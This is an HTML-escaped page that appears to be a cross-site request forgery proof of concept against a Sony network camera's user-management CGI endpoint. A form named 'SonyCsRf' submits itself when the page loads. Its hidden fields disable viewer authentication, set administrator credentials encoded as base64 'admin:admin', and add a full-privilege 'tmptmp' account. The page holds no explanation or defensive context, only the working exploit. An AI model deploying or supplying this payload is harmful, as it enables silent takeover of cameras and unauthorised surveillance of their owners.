&lt;html&gt;
&lt;body&gt;
  &lt;form name=&quot;SonyCsRf&quot; action=&quot;http://xx.xx.xx.xx/command/user.cgi&quot; method=&quot;POST&quot;&gt;
    &lt;input type=&quot;Select&quot; name=&quot;ViewerModeDefault&quot; value=&quot;00000fff&quot;&gt;
    &lt;input type=&quot;Hidden&quot; name=&quot;ViewerAuthen&quot; value=&quot;off&quot;&gt;
    &lt;input type=&quot;Hidden&quot; name=&quot;Administrator&quot; value=&quot;YWRtaW46YWRtaW4=&quot;&gt;
    &lt;input type=&quot;Hidden&quot; name=&quot;User1&quot; value=&quot;xxxx,c0000fff&quot;&gt;
    &lt;input type=&quot;Hidden&quot; name=&quot;User2&quot; value=&quot;xxxx,c0000fff&quot;&gt;
    &lt;input type=&quot;Hidden&quot; name=&quot;User3&quot; value=&quot;dG1wdG1wOnRtcHRtcA==,c0000fff&quot;&gt;
    &lt;input type=&quot;Hidden&quot; name=&quot;User4&quot; value=&quot;Og==,00000fff&quot;&gt;
    &lt;input type=&quot;Hidden&quot; name=&quot;User5&quot; value=&quot;Og==,00000fff&quot;&gt;
    &lt;input type=&quot;Hidden&quot; name=&quot;User6&quot; value=&quot;Og==,00000fff&quot;&gt;
    &lt;input type=&quot;Hidden&quot; name=&quot;User7&quot; value=&quot;Og==,00000fff&quot;&gt;
    &lt;input type=&quot;Hidden&quot; name=&quot;User8&quot; value=&quot;Og==,00000fff&quot;&gt;
    &lt;input type=&quot;Hidden&quot; name=&quot;User9&quot; value=&quot;Og==,00000fff&quot;&gt;
    &lt;input type=&quot;Hidden&quot; name=&quot;Reload&quot; value=&quot;referer&quot;&gt;
    &lt;script&gt;document.SonyCsRf.submit();&lt;/script&gt;
 &lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
